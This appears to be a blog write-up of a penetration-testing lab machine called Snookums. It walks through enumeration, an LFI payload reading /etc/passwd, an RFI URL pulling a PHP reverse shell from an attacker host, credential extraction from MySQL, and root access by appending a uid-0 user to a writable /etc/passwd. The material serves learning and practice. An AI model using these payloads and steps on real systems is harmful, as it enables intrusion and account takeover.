Read BlogpostsLet's Connect

Snookums

Privilege Escalation via writable /etc/passwd

Summary

  • FTP allowed anonymous login but directory listing failed.

  • Apache server hosted vulnerable Simple PHP Photo Gallery v0.8.

  • LFI and RFI exploits led to remote code execution via PHP reverse shell.

  • MySQL DBPASS for root found in webroot PHP config.

  • Credentials for local users recovered via double base64 decoding from MySQL.

  • Privilege escalation achieved by abusing write access to /etc/passwd.

🧵 Let's Unpack

🔎 Enumeration

nmap -p- 192.168.167.58
sudo nmap -A -T4 -sC -sN -oN nmapFull -p 21,22,80,111,139,445,3306,33060 192.168.167.58

  • FTP: vsftpd 3.0.2 allowed anonymous login (but no directory listing)

  • HTTP: Apache 2.4.6 hosted Simple PHP Photo Gallery v0.8

  • MySQL open on 3306 (unauth)

  • Samba, RPCBind, and SSH present

⚡ Initial Foothold

  • Exploited EDB-7786 on Simple PHP Photo Gallery

  • Used LFI to read /etc/passwd and RFI to execute PHP shell

# LFI
index.php?preview=box.png%00../../../../../../../../../../../../etc/passwd%00

# RFI
image.php?img=http://<attacker-ip>/reverse_shell.php

  • Reverse shell connection received, gained shell access

python -c 'import pty; pty.spawn("/bin/bash")'

🔐 Credential Extraction

  • Found db_config.php in /var/www/html:

define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');

  • Logged into MySQL using:

mysql -u root -p

>
show databases;
use <tableName>
show tables;

select * from tables;
# got creds of 3 users
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+-------------------------------------------

# Decoding password;
SELECT username, CONVERT(FROM_BASE64(password), CHAR) FROM users;

  • Extracted user credentials from users table (double base64 encoded):

SELECT username, CONVERT(FROM_BASE64(FROM_BASE64(password)), CHAR) FROM users;

michael: HockSydneyCertify123
josh: MobilizeHissSeedtime747
serena: OverallCrestLean000

  • Decoded credentials:

    • michael : HockSydneyCertify123

    • josh : MobilizeHissSeedtime747

    • serena : OverallCrestLean000

  • SSH login as michael successful

🪜 Privilege Escalation

  • michael had write access to /etc/passwd

  • Added root user manually using crafted password hash:

openssl passwd -1 -salt dhawan dhawan1337
# $1$dhawan$XHPP5JzvM1sM17BmwzpJ31

echo 'dhawan:$1$dhawan$XHPP5JzvM1sM17BmwzpJ31:0:0::/root:/bin/bash' >> /etc/passwd
su dhawan
# Password: dhawan1337

  • Gained root shell 🎉

PreviousPaydayNextBratarina

Last updated